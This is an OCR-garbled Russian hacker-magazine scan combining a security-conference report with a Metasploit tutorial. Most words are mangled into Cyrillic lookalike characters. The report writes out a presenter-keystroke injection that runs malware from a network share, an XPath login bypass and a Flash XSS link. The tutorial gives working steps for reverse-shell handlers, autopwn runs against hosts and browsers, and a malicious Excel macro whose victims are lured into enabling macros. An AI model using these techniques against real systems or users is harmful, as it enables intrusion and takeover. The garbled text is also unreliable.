набирает обороты. Смысл в том, что производитель выпускает 
базовые элементы девайса, которые ты можешь собрать в любых 
комбинациях, потратив на это гораздо меньше денег, чем на покуп- 
ку готового варианта. Так и с капе-Ьох, который представляет собой 
небольшую коробочку размером меньше точки доступа и аппарат- 
ной начинкой, как в Сізсо РІХ (по заявлениям разработчика]. И все 
это за $250 (с поддержкой ѴѴіРі — $300], если покупать напрямую 
у разработчика. В случае самостоятельной сборки и установки 
получится еще дешевле. Очень удобное решение для маленьких 
компаний, особенно для тех, которым необходимо соответствовать 




Автерпати традиционно спонсируют МісгозоП: 
чтобы отвлечь хакеров хоть ненадолго от взлома 
своих продуктов )) 




Русские вайтхаты с лева на право : Федор 
Ярочкин, Александр Поляков, Антон Чувакиеин, 
Алексей Синцов 



РСІ 055, а финансы ограничены. Кроме того, есть версия еІДе под 
серверную стойку с несколькими сетевыми интерфейсами, которая 
одновременно представляет собой маршрутизатор, корпоративный 
файервол и систему обнаружения/предотвращения вторжений стои- 
мостью в $1250. Наконец, несколько слов о том, как это работает. 
Разработчики полностью отказались от сигнатурного метода и реа- 
лизовали чисто поведенческий движок. При запуске система строит 
модель текущей сети и запоминает, как она работает в нормальном 
режиме. После того, как система обучилась, она может определить, 
какой трафик хороший, а какой плохой, исходя из своих знаний о 
существующих атаках и о твоей сети. Система обучения основана 
на экспертных системах, базах знаний и теореме Байеса. Подобные 
эксперименты я проводил еще в институте — обучал систему обна- 
ружения вторжений при помощи нейронных сетей, и, надо сказать, 
это неплохо работало. Так что желаем успехов создателю и ждем 
первых образцов, которые должны появиться в продаже с 16 ав- 
густа. Надеюсь все то, что было заявлено, будет реально работать, 
хотя не доверять автору вроде как не с чего — он был основателем 
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Пример работы сканера ѵѵззсап 

небезызвестной компании пСігсІе и автором оригинального движка 
сканера ІМсігсІе 5иіІе 360. В двух словах — это не очередной студент 
с академическим буллшитом. Те, кто заинтересовался, могут узнать 
подробнее об этой коробочке на капе-Ьох.сот . 

ПОГЛУМИСЬ НАД СТИВОМ ДЖОБСОМ 

Многим понравился доклад исследователя Ыіеіз Теизіпк (да про- 
стят меня редакторы, но я не стану коверкать имена транслитом] под 
названием «Наскіпд ѴѴігеІезз РгезепТегз». Опять-таки, до теории 
возможной атаки, наверное, догадывался не один исследователь, но 
этот парень осуществил ее на практике, изучив протокол и соорудив 
специализированный девайс. Смысл в том, что, если с помощью пре- 
зентационной указки можно выполнять различные действия с мони- 
тором, то почему бы не сэмулировать эти действия своим устройством, 
посылая аналогичные сигналы. В качестве примера был продемон- 
стрирован следующий набор команд, посланный на компьютер: 

[Шіп+К] 

стсі /с пеС изе х: ЩЩЬр : / /10 . 1 . 1 . 1/х&х : х 
[ЕпСег] 

Таким образом он заставил пользовательский компьютер открыть 
окно запуска команд, примонтировать сетевой диск и выполнить 
с него вредоносную программу. Вживую это выглядело довольно 
шокирующе. Кроме того, как указал в одном из последних слайдов 




Утилита Аррргіпі, показывающая информацию о 
ѵѵеЬ2.0 



исследователь, с беспроводными мышками теоретически воз- 
можна та же история, но он не проверял. Как знать, может быть, ты 
станешь первым, кто это сделает? :] Между делом мы решили про- 
верить радиус действия мышки, и выяснилось, что на расстоянии 
пяти метров она работает стабильно. Вот почему я всегда пользу- 
юсь тачпадом. 

ѴѴЕВ Ш ТНЕ МЮОН 

Следующий интересный доклад, «ѴѴеЬ іп ТЬе МісИІе», был от І_аигеп1: 
Оибоі: из компании ТеЫті Зесигііу. В докладе он описывал различные 
атаки, которые можно проводить на клиентов, сосредоточившись 
на НТТР-протоколе. Под «клиентами» он имел в виду различные 
устройства: от ноутбуков и КПК до с мартфонов, айфонов и ново- 
модного айпада. Итак, первое, что делает атакующий при нападении 
на клиента — это разведка. Представь себе, что ты перехватываешь 
общение клиента с каким-либо веб-сервисом, и трафик зашифрован 
при помощи 551. Казалось бы, шансы узнать информацию о клиенте 
в таком случае минимальны, но они есть. Один из примеров — брау- 
зер Могіііа периодически отправляет информацию о своей версии 
на сайт производителя по нешифрованному каналу вот таким вот 
запросом, что я, кстати, не раз замечал, пользуясь всеми любимой 
Татрегсіаіа: 

НШРр : //Ііѵе .тогіііатеззадіпд . сот/%АРР%/ 

ѵЩіаЦзпем?1оса1е=%Ь0САЬЕ%&ѵегзіоп=%ѴЕКЗІ(Ж 

%&дз=%05%&:Ьиі1(іісі=%АРРВІЛЬ0ІВ% 

ТбипсІегЬігсІ тоже светит версию: 

НШРр : //Ііѵе .тогіііатеззадіпд . сот/ЕЬипсІегЪігсІ/зЦагР? 
1оса1е=еп&ѵегзіоп=3 . 0 . 4&оз=Багміп&Ьиі1с1і 
(1=20100317134139 

Не говоря уже о продуктах Арріе во время работы с іѴѴогк и Ое: 

арріе . сош/ѵѵе1сошезсгееп/і1і^е09/ір1юЦо/ 
арріе . сот/ѵ\ге1сотезсгееп/іѵгогк09/питЪегз/ 
арріе . сот/ме1сотезсгееп/іѵ\гогк09 /кеупоЕе/ 
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«ЛХ зргау мертв!», констатирует Алексей, или все- 
таки нет? 



арріе . сот/’меісотезсгееп/іѵ\гогк09/радез/ 

- "СЕТ /чл;е1сотезсгееп/іѵ\гогк09/радез НТТР/1.1 » 

- "Могіііа/Б . О (МасіпкозЬ.; II; Іпкеі Мае ОЗ X 10_6_3; 
еп-из ) 

АррІеѴІеЪКік/533 . 16 (КНТМЬ, Ііке Сеск 



Один из возможных вариантов атаки после такой разведки — это под- 
совывание клиенту ложных обновлений, если они осуществляются по 
небезопасному протоколу. К счастью, эта задача уже решена до нас в 
утилите І5Р-еѵіІдгасІе [ іпЬЬѵІе.сот.аг/сІоѵѵп/ізг-еѵіІдгасІе-РеасІппеІхІ: ]. 
написанной командой I пІоЬуІе ЗесигКу ВезеагсЬ. Утилита поддержи- 
вает подмену обновлений для следующих продуктов: 

• Даѵа ріидіп; 

• ѴІіпгір; 



Резултат работы утилиты 5 МісЬеск в популярном 
браузере ЛгеТох 

уже порядком изъезженной темы атак на ѴѴеЬ 2.0. Как выяснилось поз 
же, доклад получился действительно полезным, и, хотя большинство 
из атак были известны ранее, представленные тулзы для их автома- 
тизации оказались очень даже интересными. Итак, список десяти 
популярных ѴѴеЬ 2.0 атак на 2010 год выглядит следующим образом: 



Шіпатр; 
МасОЗ ; 



І.Бош ЪазеЫ ХЗЗ — А^ах; 

2.8(2Ь іпз ескіоп - ЗОАР & ХМЬ; 



ОрепОккісез ; 



3 . Вііпсі ЗОЬ оѵег ДЗОЫ; 



іТипез | 



4 . АикЬ. Вуразз-ХРАТН апсі ЬБАР; 



Ьіпкесііп ТооІЬаг; 

БАР [Бохѵпіоасі Ассеіегаког] ; 
№экерасІ+ + ; 
зреесИэік . 



Б.Визіпезз Ьодіс Вуразз; 

6 . Бесотрііакіоп Аккаск апсі Іпко Ьеакаде; 

7 . Т/ІЗБЬ зсаппіпд апсі АРІ ехрозиге — Сіоисі; 

8 . ХЗЗ члткк Ріазк; 

9 . СЗКР мікк ХМЬ; 



Помимо этого она имеет АРІ для написания собственных модулей. 
Приятно, что кто-то такие идеи воплощает в жизнь, и они реально 
работают, причем не только в вымышленной академической среде, а в 
суровых боевых условиях. Кстати, как раз в момент написания статьи 
разработчик анонсировал новую версию своей утилиты, которая, веро- 
ятнее всего, будет готова, когда ты будешь читать эти строки. 

В качестве одной из контрмер предлагается использовать надстройку 
для Рігебох — еіі.огд/Ыірз-еѵегуѵѵЬеге. Напоследок докладчик расска- 
зал о целом списке 0-бау уязвимостей, найденном их компанией в по- 
пулярных девайсах, таких как ІрЬопе, НТО, ВІаскЬеггу и, конечно, ІРасІ. 
Уязвимость нулевого дня в браузере 5аба гі под Іраб была продемон- 
стрирована прямо на презентации на новеньком Іраб. Кстати, букваль- 
но через неделю после конференции были опубликованы подробности 
множества 0-бау под различные девайсы от автора презентации. 

ДЕСЯТКА НАИБОЛЕЕ ОПАСНЫХ АТАК НА ѴѴЕВ 2.0 

Те, кто дочитал до этого раздела — молодцы, потому что напоследок 
я припас самое сладкое. Как бывшему фанату веб-атак и всего, что с 
ними связано, мне было очень интересно посмотреть, что же такого 
мог придумать ЗЬгеега] ЗЬаЬ, директор компании В Іие I пбу, в рамках 



10 .МсІдекз/МазЬир Ехріоікакіоп . 

Изучим наиболее интересные моменты. 

1 . Начнем с первой атаки — межсайтовый скриптинг через ООМ. Тема 
не новая, но набирающая обороты в связи с наплывом ѴѴеЬ 2.0 и по- 
всеместным использованием в А]ах-приложениях следующих методов, 
в которые можно внедрить злонамеренный ІаѵаЗсгірі-код: 

сіоситепк . шгіке (...) 
сіоситепк . шгікеіп (...) 
сіоситепк . ЪоЫу . іппегНкт1=... 
сіоситепк . когтз [ 0 ] . аскіоп=... 
сіоситепк . аккаскЕѵепк (...) 
сіоситепк . сгеаке... (...) 
сіоситепк . ехесСоттапс! (...) 
сіоситепк . Ъобу . ... 
міпсіом. аккаскЕѵепк (...) 
сіоситепк . 1осакіоп=... 
сіоситепк . Іосакіоп . 1юзкпате=... 
сіоситепк . Іосакіоп . геріасе (...) 
сіоситепк . Іосакіоп. аззідп (...) 
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сіоситепк . ІЖЬ=... 
ісіпсіом . паѵідаке ( ... ) 

Если список-то, в принципе, известен, то тулза ЭОМЗсап, которая 
автоматизирует поиск Оот-ЬазесІ Х55 для меня была нова — раньше 
как-то все, в основном, делал руками. Подробно описать функционал 
не хватит места, а заинтересовавшиеся могут скачать тулзу с Ыиеіпбу. 
сот/РОМЗсап.гір и попробовать самостоятельно. 

2. Обход авторизации через Х-РаіЬ. Само по себе ни чем не отличает 
ся от попсовой 50І_-инъекции в окошке ввода логина и пароля, за 
исключением того, что на серверной стороне у нас не 50І_, а ХраіЬ с 
другим синтаксисом. Но для простейших атак, таких как обход авто- 
ризации, даже синтаксис такой же, так что наверняка кто-либо из вас 
проводил эту атаку, даже сам не подозревая о том, что это, на самом 
деле, не просто ЭОЬ-инъекция. Предположим, в коде у нас присутс- 
твует такая строка: 

зСгіпд сгейепСіаІ = 

" / /изегз [ @изегпате= 1 " +изег+ " 1 апсі 
@раззѵ\гогс!= ' "+разз+ м 1 ] " ; 

В результате банальной последовательности ' ог 1=1 ог "=', поданной 
на вход, мы получим доступ к системе от лица первого юзера в списке, 
коим обычно является администратор. 

3. Декомпиляция и Х55 через ЕІазЬ. Для декомпиляции 5ѴѴЕ-файлов, 
как ни странно, можно воспользоваться утилитой 5ѴѴЕ бесотріііег. Для 
чего нам декомпилировать код? Ну, к примеру, для того, чтобы найти в 
нем больше уязвимостей. Предположим, в процессе декомпиляции мы 
обнаружили следующую строку: 

оп (геіеазе) { 

деЫШЬ (_гооР . сІіскТАС, "_Ыапк" ) ; 

} 

Этот код получает на вход параметр сІіскТАѲ, и не проводит его анализ 
на валидность. Таким образом, обратившись по следующей ссылке 

ТШРр : //игІ/Со/ТІазІі-ііІе . змН?с1іскТАС=з аѵазсгірр : 
аіегк ( ' хзз * ) 

В качестве защиты можно использовать такую конструкцию: 
оп (геіеазе) { 

ІТ (_гооС . сІіскТАС. зиЬзкгіпд ( 0 , 5 ) == "ТШРр:" || _гоок . 
сІіскТАС. зиЬзкгіпд (0 , б) == "ТШРрз:" И _гоок . сІіскТАС . 
зиЬзкгіпд ( 0 ,1 ) == " / " ) { 

деЫШЬ (_гооС . сІіскТАС, "_Ыапк" ) ; 

} 

} 

Дополнительную информацию по данной теме можно почерпать из 
докладов: 

• 0ѴѴА5Р ЕІазЬ Эесигку Ргоіесі: 

• «ВІіпсІесІ Ьу іІазЬ» (зіісіез аз рсИ) Ьу Ргаіакіа бадсіаіеп — ВІаскНіаі РС 
2009 

• «Ыеар Ыеѵѵ, апб Рісіісиіоиз РІазЬ Наскз» Ьу Міке В а і Іеу — ВІаскЬаІ: 

РС 2010 

• «А Ьагу Реп Тезіег'з биібе Іо Тезііпд РІазЬ Арріісабопз» 

4. ѴѴЭРЬ Эсаппіпд. ѴѴЗРЬ. ѴѴеЬ Зегѵісе Оізсоѵегу Рапдиаде — язык 
описания веб-сервисов, основанный на языке ХМЬ. Представляет 
собой ХМЬ-файл особенного формата, в котором определяется вид от- 
правляемых и получаемых сервисом ХМР-сообщений, а также список 
операций, выполняемых над сообщениями, и способ, которым со- 
общение будет доставлено. Это очень критичная информация, которая 
может помочь при дальнейших атаках. Для поиска веб-сервисов и их 



файлов описаний можно воспользоваться гуглом, используя следую- 
щие запросы: 

Іпигі : отзсіі 
Іпигі : азгпх 

Для упрощения данных атак можно использовать утилиту ѵѵзЭсаппег, 
которая помогает получить формат ХМР-сообщений, которые удобно 
посылать на сервер, получая ответы, и, что самое главное, модифици- 
ровать посылаемые запросы, используя различные фаззинг-методы. В 
общем, тулза очень юзабельная; до ее выпуска приходилось использо- 
вать множество других, не слишком удобных утилит. 

5. СЭРЕ ѵѵііЬ ХМР. Кактолько не извращались с уязвимостью СЭРЕ, 
придумывая все новые и новые подвиды (например, СЭРЭ — Сгозз 
зке Ые иріоаб или межсайтовая загрузка файлов). К примеру, в админ- 
ке сайта есть функционал загрузки файлов, реализуемый через (ЗЕТ/ 
Р05Т-запрос, а мы подсовываем админу ссылку, которая выполняет 
данные действия, загружая необходимый нам файл. Неудивительно, 
что, используя ХМР-протокол, можно также организовывать С5РЕ- 
атаки, причем зачастую в ХМР-запросах отсутствует проверка источ- 
ника. Подробнее об этой атаке можно почитать тут: эепіезітопкеѵ.пеі:/ 
Ы.од/сзгРхтІ-розІ-гедиезЕ 

В докладе также использовались различные утилиты для упрощения 
анализа ѴѴеЬ 2.0 проектов: 

РОМЗсап (Веіа) — тулза для анализа РОМ-модели сайта на предмет 
выявления Х55-уязвимостей, трассировки кода и поиска логических 
ошибок. 

РОМТгасег (Веіа) — плагин для Рігеіох, осуществляющий трассировку 
РОМ у ѴѴеЬ 2.0 сайтов. 

Віпдіпд(ВеІіа) — навороченная система получения информации о сайте 
и его поддоменах (и наоборот). Основана на АРІ Віпд. 

ѴѴеЬ2Еи22 (Веіа) — прокси фаззер, заточенный под разбор и модифи- 
кацию 650Ы и ХМЬ-протоколов. 

ѴѴеЬ2Ргоху ( В еіа ) — аналогичная утилита, только без возмож- 
ности модификации, реализующая доскональный анализ ѴѴеЬ 2.0 
трафика. 

Арр Ргі пі (ВеЫ — утилита, реализующая фингерпринтинг серверных 
приложений, установленных на сервисе. Запустив ее, к примеру, на 
всеми любимый сервис Ѵкопіакіе.ги, мы получим следующую инфор- 
мацию: веб-сервер пдіпх/0.7.59 и М ісгозоіі- 1 15/7.0, используемый ѴѴеЬ 
2.0 движок — зсгірЕасиІоиз. 

АррСобеЭсап 1 .2 — утилита для поиска уязвимостей в исходных кодах 
приложения. 

В общем, если кому интересна данная тема — на сайте автора есть 
информация о трех его книгах и множество другой полезной инфы по 
взлому ѴѴеЬ 2.0, включая курсы, которые он проводит на различных 
конференциях, таких как НІТВ, ВІаскЬаІ: и прочие. 

И ЕЩЕ! 

Кроме всего прочего на конференции была стойка НііЬОоЬ, где 
каждый мог зарегистрироваться, оставить о себе необходимую 
информацию, пройти ряд тестов и, возможно, получить работу в 
какой-нибудь международной компании. Кстати, там даже была 
стойка компании Ооодіе, и они тоже нуждаются в светлых умах. 
Для тех, кто ни на секунду не может оторваться от взлома, были 
устроены соревнования из серии «Саріиге іЬе ііа д », где команды 
соревновались между собой в искусстве взлома и защиты. Еще 
одна интересная особенность крупных конференций в том, что 
обычно первые два дня на них идут мастер-классы, на которых 
специалисты в своих областях проводят обучение других пенте- 
стеров. 

Наконец, нельзя не отметить грандиозную вечеринку по поводу окон- 
чания конференции, проводимую на корабле, плавающем по каналам 
Амстердама. Так что хочу поблагодарить организаторов, и надеюсь на 
скорую встречу в Малайзии! т 
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Появившись на свет 7 лет назад, МБР впоследствии из простого фрэймворка 
для написания рабочих сплоитов превратился сначала в некий «швейцарский 
нож», а теперь - в целую мастерскую по проведению пентестов, включая 
в себя все необходимое - от сбора инфы до продвинутых способов 
постэкслуатации. Не зря ведь МБР входит в пятерку самых юзаемых тулз. 



И что радует - МБР продолжает расти и 
узнаешь из этой статьи. 

Изначально в статье предполагалось описать возможности автоматиза- 
ции действий в МЭР, но, проанализировав знания народа о фреймворке, 
было решено поведать о более-менее продвинутых встроенных воз- 
можностях его самого, а об их автоматизации будет сказано по ходу. Это 
чтобы люди не изобретали велосипед :). 

Кстати, о знаниях. Неудивительно, что их не так много, так как всеобъем- 
лющих статей/книг о МеІазрІоіРе даже на английском нету. Так что 
основные нычки с инфой — иностранные блоги, да личные исследова- 
ния. Плюс радует, что Руби — вещь простая, и по чужим примерам можно 
что-то свое дельное сделать. 

Но к делу! Все описанное касается последней версии — МЭР 3.4.2. 

ГУИ ВОЗВРАЩАЕТСЯ! 

Для тех, кто не любит консоль или лень разбираться с командами МЭР, 
существует гуишная оболочка на основе ОТК. Точнее, существовала, так 



развиваться! А в каком направлении - 



как с версии 3.3 на нее забили. Если не ошибаюсь, то же самое случи- 
лось и с тзР/ѵеЬ. То есть пользоваться еще можно, но и так со стабильно- 
стью были проблемы, а тут... эх! 

Но во время подготовки статьи случилось хорошее — новая гуишная 
оболочка. Она изменилась и снаружи, и внутри. Если точнее, то она 
написана на Заѵа, потому кроссплатформенна, и ктомуже взаимодей- 
ствует с МЭР через ХМЕРРС интерфейс, то есть можно использовать ее 
удаленно. 

Запуск гуи делается в две стадии: стартуем тзітрссі, коннектимся к нему 
через тзідиі. Под никсами запустив ппзбдиі можно просто кликнуть «зіагі: 
пеѵѵ тзіргссі» 

Версия для ѴѴіп: 

1. Запускаем Судѵѵіп консоль 
2 . ссі /тзО 



► обо 
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Ьгоѵѵ5ег_аиІорѵѵп в действии: версия браузера/ОС 
определена, сплоит запущен, шелл получен 

3. тзігрссі -3 -II изегпате -Р раззчлгогсі 

где -3 — отключение ЗЗЬ, и придуманные логин/пасс 

4. запускаем тзідиі . з аг , который храниться в %МЗР%\ 
тзІЗ ХсІаСаХдиі либо двойным кликом, либо в консоли (не 
в судчлгіп'е) : 

заѵа -заг тзідиі.заг 

В тзі'диі вводим логин/пасс, порт, ІР и коннектимся. 

Кое-чего, даже по сравнению со старой гуи, не хватает. Например, до- 
ступа к консоли или просмотр логов. Но работать можно, особенно если 
требуется по быстрому пробежаться по сплоитам, модулям, полазить по 
чужому компу и т.д. 

СБОР ИНФОРМАЦИИ 

Тебе должно быть известно, что МБР работает с БД для складирования 
информации, обмена ей между своими модулями. И это направление 
активно развивается. 

Для начала, единственная полностью поддерживаемая БД — это 
РозІдгеБОБ. ОтЗСОе отказались из-за вопросов производительности/ 
масштабируемости, с МуБОБтоже что-то не гладко пошло. Вообще, уста- 
новка Розідгез’а не должна вызвать проблем. Драйвер для взаимодей- 
ствия вшит в М5Р. Под ѴѴіп: ставим, задаем пасс для юзера — розідгез 
и порт. Через рдАбтіп: коннектимся к локальному серваку, создаем еще 
одного пользователя «Роли входа» (тзПізег), создаем БД в «Базы» 
(тзІ_бЬ). Там же можно настроить сам БОБ-сервак, сделав его «побезо- 
пасней», да и полазить по таблицам М5Р. 

В тзіюопзоіе: 

тз1> бЬ_бгіѵег розСдгездІ 

шзП> бЬ_соппесб тзб_изег :разз@127 . О . О . 1 : 5432/тз^_бЬ 

Теперь команда бЬ_сгеа1:е не работает напрямую, можно только коннек- 
титься к существующей БД, и, если есть соответствующие права (каку 
юзера розідгез], база автоматически создастся. Иначе — создавать базу 
вручную в Розідгез’е. 

Но это не так страшно, ведь можно пользоваться ѵѵогкзрасе’ами. БД 
одна, таблицы те же, но модули обмениваются/добавляют инфу только в 
текущем спэйсе. Попробуешь — поймешь, бб_ѵѵогкзрасе тебе в помощь. 
Немного разберемся с командами: 

сИэ_зегѵісе — выводится инфа о портах/сервисах, просканированных 
либо модулями, либо встроенным птар’ом, либо импортированная из 
сторонних программ. На основе этого работает бЬ_аи1:орѵѵп с параметром 
-р (по портам); 

бЬ_по1;е5 — «заметки», типа версии ОС, полученные из ІЧтар, или какие- 
то «подробности» полученью ѴѴМар’ом. Жаль, но сІЬ_аи1;орѵѵп, похоже, не 
смотрит б Ьщіоіюз для выбора сплоита. 

бЬ_ѵиІпз — уязвимости, найденные либо модулями МЗР(ѴѴМар), либо 
импортом из Ыеззиз’аЮрепѴАБ), Ыехрозе. На основе этого работает 




РозІдгеБОІ- + МБР. Команда сіЬ_сгеаІе 

бЬ_аи1:орѵѵп с параметром -х (по уязвимостям). 

Для примера просканируем хост птар’ом и результаты попадут в нашу 

БД: 

шзП> сПэ_птар -РЫ -зѴ 192.168.0.101 

Итог от модуля порт-сканера из М5Р будет аналогичным, и данные тоже 
попадут в БД. Вот только для определения сервисов требуется пользо- 
ваться уже другими модулями (все аих-модули с «ѵегзіоп» на конце в 
разделе зсаппег, например, 5саппег/ітар/ітар_ѵегізоп). 

шз1> изе зсаппег/рогСзсап/Сср 
тз!> зеР КН08Т8 192.168.0.101 
тз1> зеР РОКТ8 1-1000 
тзР> гип — з 

Чтобы автоматизировать последние действия, да и вообще любые 
действия в МБР, можно воспользоваться так называемыми гезоигсе- 
файлами. По сути это обычные текстовые файлики с последовательным 
перечислением команд для МБР. Например, создадим ресурсикдля 
быстрого запуска «сервера» для реверсового теіегргеіег’а. Для этого 
пихнем в файл (теІтеѵЬапсІІ.гс) следующие команды: 

изе ехріоір/тиірі/йапсііег 

зеР РАУЬОАБ міп<іоѵ\ю/теРегргеРег/геѵегзе_Рср 

зеР ЬРОКТ 4444 

зеР ЬНОЗТ 192.168.0.102 

ехріоір -з 

Ьаск 

Запускаем наш скрипт с помощью «гезоигсе»: 

тзР> гезоигсе тергеѵііапсіі . гс 

Как видишь — очень удобно. Но это еще не все. Самое сладкое в том, что 
в этих скриптах можно писать код на Руби, что и позволяет нам, напри- 
мер, установить взаимоотношения между отдельными модулями МБР. 
Кстати, Ьоте/.тзіЗ/тзіюопзоІе.гс — скрипт, который автоматически за- 
пускается при старте тзіоопзоіе. В него очень удобно запихнуть коннект 
в БД, например. 

входим... 

ѴѴМАР. ѴѴМАР — это попытка заточить МБР под веб-приложения 
и как-то автоматизировать все это дело. Проект ѴѴМАР пока на- 
ходится на ранней стадии и работает не особо хорошо, особенно 
по сравнению со своими конкурентами. Вряд ли он будет раз- 
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РозІдгеЗОЬ + М5Р. Команда сІЬ_есШ 



виваться, во всяком случае, в своем нынешнем виде, а причина в 
том, что Ра рісі 7 начала очень плотно финансировать опенсорсный 
ѵѵЗаІ фрэймворк, который и заточен под дела веба, так что можно 
ожидать слияние внутренностей или функционала МЭР и ѵѵЗаР Но 
все же небольшой пример (требуется подключение к БД): 




Даешь роботизацию стране! 




1 . Подгружаем плагин ѵппар : 
тзб> Іо ас! <іЬ_ѵтіар 

2. Добавляем жертву: 

тзб> ѵ\7тар_багдебз -а йббр : / /шт . ехатріе . сот/ 

3. Просмотр и запуск модулей против нашей жертвы: 
тзб> шпар_пт -б 

тзб> ѵлпар_гіт -е 

Итоги складируются в БД и доступны через 6 Ь_ѵіііп 5, бЬ_по1:е5. 

Для некоторых модулей требуется настройка параметров. Это мож- 
но сделать с помощью команды зеід. 

Также в ѴѴМАР есть паук (\л/тар_сга\л/1ег) и возможность взаимо- 
действия с прокси (\л/тар_ргоху). 

Вдобавок любителям помучить базы данных всевозможными ин- 
жектами советую посмотреть модуль МЭР — зсаппег/ЬНр/здІппар. 
Это порт одноименной тулзы — ЭСБтар. Вещь, по ходу, мощная 
:). Инфу о тулзе можно почерпнуть на сайте создателей — здітар. 
зоигсеіюгае.пеб 

сІЬ_аиІорѵѵп. Автопавнилка в МЭР обзавелась парой полезных 
параметров: 

-Р — указывает минимальный ранк эксплойта, который будет при- 
меняться; 

-т — задают регекспу для выбора сплоитов. 

Например: 



ствующий сплоит. Пока что основной фичей модуля является точное 
определение версии браузера/ОС. Используются как серверные, так и 
клиентские возможностираѵаЭсгірІ:) по детекту. То есть обмануть модуль, 
подставив другой ІІзег-АдепІ, точно не удастся. 

Из имеющихся сплоитов хорошо валятся олдскульные версии браузеров, 
но самое приятное в том, что просто добавлять свои сплоиты, а это уже 
сила. Бесплатный сплоитпак получается. 

В будущих версиях обещают добавить возможности по обфускации 
сплоитов (чтобы антивирями не палилось) и возможности по выбору 
нагрузок. 

Например, создадим сервак с бэкконнектом для шеллов 192.168.0.102: 

тзб> изе зегѵег/Ъгомзег_аиборѵт 
тзб> зеб ЬНОЗТ 192.168.0.102 
шзб> зеб ШІ іпсіех.ріір 
шзб> ехріоіб ~з 

Впариваем ссылку Ыір://1 92.1 68.0.1 02/іпбех.рбр и радуемся полученному 
шеллу (см. рисунок). 

ѴВА 

В разделе ЕазуНаск я уже писал о создании «троянов» с помощью МЭР, 
но засылать ехе-файлы — это очень палевно. Юзеры нынче стали пу- 
гливые и не открывают все, что попало, а там еще и предупреждения от 
винды. Куда менее палевно применять какие-нибудь офисовские файлы: 



шзб> бЪ_аиборѵт -б -р -т Мпскжз -К ехсеііепб 



выведет список только лучших сплоитов под стандартные ѴѴіп-сервисы. 
Кстати, с версии 3.3.1 с Ыехрозе можно работать прямо из МРЭ и сразу 
автопавнить на основе выявленных уязвимостей. 

1. Подгружаем плагин и подключаемся к Кехрозе: 
шзб> Іоаб пехрозе 

шзб> пехрозе_соппесб тзб_изег :разз@127 . 0 . 0 . 1 

2. Запускаем только лучшие сплоиты по найденным уяз- 
вимостям: 

тзб> пехрозе_зсап -К ехсеііепб -х 192.168.0.101 

ВШ5ЕК_А1Л0РШ 

Рели предыдущая павнилка была заточена по стандартные сплоиты, то 
эта — под клиентские, нацеленные на браузеры жертв, что понятно из 
названия. 

По сути, этот модуль поднимает НТТР-сервер и на нем же поднимает 
все сплоиты под браузеры. Когда жертва заходит на наш сервак, модуль 
определяет версию браузера и ОС, после чего запускает соответ- 



шзбрауіоасі міп(Іоѵ^з/з]те11_Ъіпс1_бср ЬРОКТ=5555 V > 
шасгоз . ѵЬа 

Далее создаем, например, экселевский документик со страшными 
именем «Зарплата сотрудников». Потом открываем полученный ѴВА, 
текст макроса (МАСП0 СОЮЕ) пихаем в макрос документа (Сервис -> 



НЕСКОЛЬКО ПОДСКАЗОК: 



В тзіюопзоГе отлично работает автодополнение посредством нажа- 
тия ТаЬ, ктомуже все команды поддерживают хелп параметром «-Ь». 
Если хочешь приостановить выполнение команды — Сбгі+С, отпра- 
вить в бэкграунд — СМ+2. 

Копирование текста в судѵѵіп’е делается с помощью левой/правой 
кнопки мыши, вставка — ЭЬіІІ+Іпзегб 

Под виндой доступ к интерфейсам тзіюіі, тзірауіоасі и т.д. осущест- 
вляется через консоль судѵѵіп. Но желательно хорошенько потестить, 
так как не все функции могут работать адекватно. 
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Абрикос, капуста, вишня.... Начинок так 
много, что глаза разбегаются 
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МБР отлично работает через 
портфорвардинг пеісаі 





> іпіо 

Инфа о теіазріоііе: 

• оОюпзіѵе-зесигДу. 
сот/теіазріоіі:- 
ипіеазбесі/ 

• теІазрІоіОсот 



Макрос Редактор ѴВ], а в конец документа — нашу 
«нагрузку» (РАУЮАО ОАТА]. В начало документа можно до- 
бавить какие-нибудь расчеты для красоты. Так как макросы 
по дефолту отключены (с версии (ЖісеХР, насколько мне 
известно], то строчкой вида «Внимание! Работа с базой 
возможна только при включенных макросах. Чтобы их вклю- 
чить, зайдите в «Сервис -> Параметры Безопасность -> 
Защита от макросов Низкая» и перезапустите документ», 
можно заставить пользователя подключить макросы. В 
итоге — шелл на 5555 порту. 

СМЫСЛОВАЯ НАГРУЗКА 

На самом деле выбор на грузки (рауіоасі] к сплоитам — дело 
важное. Но их в М5Р много, так что я немного пробегусь по 
ним (в основном по ѴѴіп*], чтобы появилось общее понима- 
ние. Во-первых, есть общее разделение по ОСям, а также 
ПО и подгружаемым интерпретаторам (гибу, регі]. 

Общее разделение по описанию: 

С пометкой «Іпііпе» — это «целиковые» шеллкоды. Они 
большие, потому не всегда влезают в эксплойты; 

«Зіадег» — нагрузки, разделенные на части. В сплоит 
попадает небольшой шеллкод, в основном для установки 
соединения, остальное подгружается при подключении; 
«Огб» — «заточенные» нагрузки. Маленькие по размеру, но 
привязанные к статическим адресам в памяти системной 
ОШки; 

«ВіпсІ» — открытие порта и ожидание соединения; 

«Веѵегзе» — бэкконнект-шелл; 

«Ріпфогі» — происходит поиск сокета, через который ра- 
ботал эксплойт, далее шелл открывается через него. Поиск 
осуществляется по номеру порта; 

«ЕіпсІІад» — аналогично предыдущему, только определение 
сокета ведется за счет прослушки всех доступных в ожида- 
нии прихода 4-байтового тэга от хакера.; 

«Ехес, Боѵѵпіоасфехес, 11р_ехес» — шеллкод на запуск 
команды, скачку/закачку и запуск; 

«Меіегргеіег» — продвинутая нагрузка :]; 

«ѴІ\ІС» — запускаем ѴЫС-сервер у жертвы; 

«бШщесбоп» — подгрузка 0І_І_’ок в память процесса. Инжект 
РЦ-’ок есть двух ВИДОВ; 

«теізѵс» — целиком загружает ппеіегргеіег жертве и пропи- 
сывает его как сервис; 

«РаззіѵеХ» — наш шелл выступает элементом АсбѵеХ. 
«ІЧоІЧХ» — шеллкоды с обходом механизма защиты памяти 
ОЕР; 

«БЫВ» — те, что могут работать по именам хостов, а не по I Р; 
«НТТР5» — шелл, который общается по шифрованному 
НТТРВ-протоколу (жаль, без поддержки прокси]. 

Немного остановлюсь на РаззіѵеХ, так как они очень хороши. 
Суть заключается в том, что наш шелл прописывается как 
элемент АсбѵеХ, а взаимодействие происходит через скры- 



І щі 1 > гоиіе асШ 192.168.146.0 255.259.255.0 1 
щг-Г 5- гонге ргіпг 

Асгіѵе Боигіпд Т*Ы е 



5иЬпе1 Неггпазк Санешау 



192-168.146.0 255.255.2*5. О БевдІОП 1 

э иге аих і 1 і аг у /г сапм е г/ рог і: г с а л/г с р 
тг* аихіІіагуС ) > зег 192. 1,68. 146,0/24 

